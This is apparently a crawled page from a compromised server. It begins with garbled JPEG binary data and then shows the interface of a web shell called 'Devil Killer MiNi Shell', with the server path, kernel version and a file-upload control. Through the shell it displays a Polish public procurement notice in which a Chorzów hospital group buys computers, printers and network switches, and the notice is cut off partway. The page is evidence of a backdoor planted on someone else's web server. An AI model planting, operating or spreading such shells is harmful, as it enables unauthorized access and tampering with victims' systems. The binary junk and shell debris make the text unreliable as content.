JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241022/0055839101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa sprzętu komputerowego dla Zespołu Szpitali Miejskich w Chorzowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ZESPÓŁ SZPITALI MIEJSKICH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271503410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzelców Bytomskich 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">032 34-99-268</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">032 34-99-299</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zsm.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zsm.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa sprzętu komputerowego dla Zespołu Szpitali Miejskich w Chorzowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-044add17-6d91-422f-8c5a-6721dd0b522f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00558391</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00214796/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Zakup i dostawa sprzętu komputerowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zsm-chorzow.ezamawiajacy.pl/pn/zsm-chorzow/demand/177890/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zsm-chorzow.ezamawiajacy.pl/pn/zsm-chorzow/demand/177890/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej tj.<br/>Platformy zakupowej: https://zsm-chorzow.ezamawiajacy.pl. Ilekroć w dalszej części SWZ jest mowa o: „Platformie zakupowej” –<br/>należy przez to rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień publicznych w formie<br/>elektronicznej służące szczególności do przekazywania ofert, oświadczeń zwane dalej „Platformą” lub „eZamawiający”. Informacje<br/>dotyczące odpowiedniego przygotowania stanowiska Wykonawcy znajdą na stronie:<br/>https://oneplace.marketplanet.pl/przygotujstanowiskopcwykonujacponizsze-<br/>kroki<br/>b) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zespołu Szpitali Miejskich w<br/>Chorzowie; https://zsm-chorzow.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>c) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>d) Rejestracja konta następuje poprzez: kontakt z numerem telefonu podanym w potwierdzeniu lub jeżeli użytkownik nie skontaktuje<br/>się telefonicznie konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>e) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym, a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej<br/>za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania poprzez<br/>kafelek „Wiadomości” kierujący do modułu korespondencji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego – Klauzula informacyjna dotycząca Zamawiającego została zamieszczona na ostatniej stronie specyfikacji warunków<br/>zamówienia (dalej w treści: SWZ). Natomiast, klauzula informacyjna dotycząca Wykonawcy ujęta jest w pkt 12 załącznika nr 1 do<br/>SWZ – „Formularz ofertowy”. Wykonawca zobowiązany jest zapoznać wszystkich pracowników z klauzulą dot. powierzenia danych<br/>osobowych, a których dane zostaną przekazane Zamawiającemu w trakcie i po rozstrzygnięciu postępowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSM/ZP/42/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 1 – zestawy komputerów stacjonarnych z oprogramowaniem, komputer opisowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">37453300-1 - Dyski</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1.	Przy wyborze i ocenie oferty Zamawiający będzie się kierować wyłącznie następującymi kryteriami:<br/>	Kryterium: Cena oferty - 60 %<br/>	Kryterium: Okres gwarancji - 40 %<br/>a)	Kryterium Cena oferty (Pc):<br/>1)	Ocena kryterium zostanie obliczona wg wzoru: „Pc = Cn / Cb * 60”, gdzie:<br/>	Pc - punkty otrzymane za cenę <br/>	Cn - cena najniższej oferty<br/>	Cb - cena badanej oferty<br/>2)	Oferta w kryterium cena może otrzymać maksymalnie 60 punktów, pozostałe oferty proporcjonalnie mniej.<br/>3)	Liczba punktów dla przyjętego kryterium będzie liczona osobno z dokładnością do drugiego miejsca po przecinku. <br/>4)	Do wyliczenia punktowego zostanie przyjęta wartość brutto wyrażona w złotych zgodnie z danymi zamieszczonymi przez Wykonawcę w FO.<br/><br/>b)	Kryterium: Okres gwarancji (Pt):<br/>Okres udzielonej gwarancji zadeklarowany w badanej ofercie wyrażony jest przez Wykonawcę w pełnych miesiącach.<br/><br/>Minimalny obowiązkowy okres udzielonej gwarancji wynosi: 36 miesięcy od momentu dostarczenia sprzętu. Wykonawca zobowiązany jest podać czas w pełnych miesiącach.<br/><br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 40 pkt<br/><br/>Ocena ofert w kryterium czas gwarancji zostanie przeprowadzona w odniesieniu do zaoferowanego czas gwarancji i będzie dokonywana według następujących zasad:<br/>Okres udzielonej gwarancji od 60 miesięcy – 40 pkt,<br/>Okres udzielonej gwarancji od 48 miesięcy do 59 miesięcy – 20 pkt,<br/>Okres udzielonej gwarancji od 36 miesięcy do 47 miesięcy – 0 pkt.<br/><br/>Wykonawca, który nie poda w ofercie okresu udzielonej gwarancji zostanie przyznane w niniejszym kryterium 0 pkt, a Zamawiający uznaje, że Wykonawca oferuje udzielenie gwarancji na minimalny okres tj. 36 miesięcy.<br/><br/>13.2.	Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie ze wzorem: Pc + Pt = Ocena końcowa.<br/>13.3.	W przypadku gdy dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze wśród tych ofert, ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>13.4.	Zamawiający udzieli zamówienia Wykonawcy który otrzyma największą ilość punktów w ocenie końcowej oferty, a jego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 2 – drukarki laserowe, urządzenia wielofunkcyjne, skanery </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">37453300-1 - Dyski</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1.	Przy wyborze i ocenie oferty Zamawiający będzie się kierować wyłącznie następującymi kryteriami:<br/>	Kryterium: Cena oferty - 60 %<br/>	Kryterium: Okres gwarancji - 40 %<br/>a)	Kryterium Cena oferty (Pc):<br/>1)	Ocena kryterium zostanie obliczona wg wzoru: „Pc = Cn / Cb * 60”, gdzie:<br/>	Pc - punkty otrzymane za cenę <br/>	Cn - cena najniższej oferty<br/>	Cb - cena badanej oferty<br/>2)	Oferta w kryterium cena może otrzymać maksymalnie 60 punktów, pozostałe oferty proporcjonalnie mniej.<br/>3)	Liczba punktów dla przyjętego kryterium będzie liczona osobno z dokładnością do drugiego miejsca po przecinku. <br/>4)	Do wyliczenia punktowego zostanie przyjęta wartość brutto wyrażona w złotych zgodnie z danymi zamieszczonymi przez Wykonawcę w FO.<br/><br/>b)	Kryterium: Okres gwarancji (Pt):<br/>Okres udzielonej gwarancji zadeklarowany w badanej ofercie wyrażony jest przez Wykonawcę w pełnych miesiącach.<br/><br/>Minimalny obowiązkowy okres udzielonej gwarancji wynosi: 36 miesięcy od momentu dostarczenia sprzętu. Wykonawca zobowiązany jest podać czas w pełnych miesiącach.<br/><br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 40 pkt<br/><br/>Ocena ofert w kryterium czas gwarancji zostanie przeprowadzona w odniesieniu do zaoferowanego czas gwarancji i będzie dokonywana według następujących zasad:<br/>Okres udzielonej gwarancji od 60 miesięcy – 40 pkt,<br/>Okres udzielonej gwarancji od 48 miesięcy do 59 miesięcy – 20 pkt,<br/>Okres udzielonej gwarancji od 36 miesięcy do 47 miesięcy – 0 pkt.<br/><br/>Wykonawca, który nie poda w ofercie okresu udzielonej gwarancji zostanie przyznane w niniejszym kryterium 0 pkt, a Zamawiający uznaje, że Wykonawca oferuje udzielenie gwarancji na minimalny okres tj. 36 miesięcy.<br/><br/>13.2.	Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie ze wzorem: Pc + Pt = Ocena końcowa.<br/>13.3.	W przypadku gdy dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze wśród tych ofert, ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>13.4.	Zamawiający udzieli zamówienia Wykonawcy który otrzyma największą ilość punktów w ocenie końcowej oferty, a jego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 3 – przełączniki sieciowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">37453300-1 - Dyski</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1.	Przy wyborze i ocenie oferty Zamawiający będzie się kierować wyłącznie następującymi kryteriami:<br/>	Kryterium: Cena oferty - 60 %<br/>	Kryterium: Okres gwarancji - 40 %<br/>a)	Kryterium Cena oferty (Pc):<br/>1)	Ocena kryterium zostanie obliczona wg wzoru: „Pc = Cn / Cb * 60”, gdzie:<br/>	Pc - punkty otrzymane za cenę <br/>	Cn - cena najniższej oferty<br/>	Cb - cena badanej oferty<br/>2)	Oferta w kryterium cena może otrzymać maksymalnie 60 punktów, pozostałe oferty proporcjonalnie mniej.<br/>3)	Liczba punktów dla przyjętego kryterium będzie liczona osobno z dokładnością do drugiego miejsca po przecinku. <br/>4)	Do wyliczenia punktowego zostanie przyjęta wartość brutto wyrażona w złotych zgodnie z danymi zamieszczonymi przez Wykonawcę w FO.<br/><br/>b)	Kryterium: Okres gwarancji (Pt):<br/>Okres udzielonej gwarancji zadeklarowany w badanej ofercie wyrażony jest przez Wykonawcę w pełnych miesiącach.<br/><br/>Minimalny obowiązkowy okres udzielonej gwarancji wynosi: 36 miesięcy od momentu dostarczenia sprzętu. Wykonawca zobowiązany jest podać czas w pełnych miesiącach.<br/><br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 40 pkt<br/><br/>Ocena ofert w kryterium czas gwarancji zostanie przeprowadzona w odniesieniu do zaoferowanego czas gwarancji i będzie dokonywana według następujących zasad:<br/>Okres udzielonej gwarancji od 60 miesięcy – 40 pkt,<br/>Okres udzielonej gwarancji od 48 miesięcy do 59 miesięcy – 20 pkt,<br/>Okres udzielonej gwarancji od 36 miesięcy do 47 miesięcy – 0 pkt.<br/><br/>Wykonawca, który nie poda w ofercie okresu udzielonej gwarancji zostanie przyznane w niniejszym kryterium 0 pkt, a Zamawiający uznaje, że Wykonawca oferuje udzielenie gwarancji na minimalny okres tj. 36 miesięcy.<br/><br/>13.2.	Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie ze wzorem: Pc + Pt = Ocena końcowa.<br/>13.3.	W przypadku gdy dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze wśród tych ofert, ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>13.4.	Zamawiający udzieli zamówienia Wykonawcy który otrzyma największą ilość punktów w ocenie końcowej oferty, a jego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> 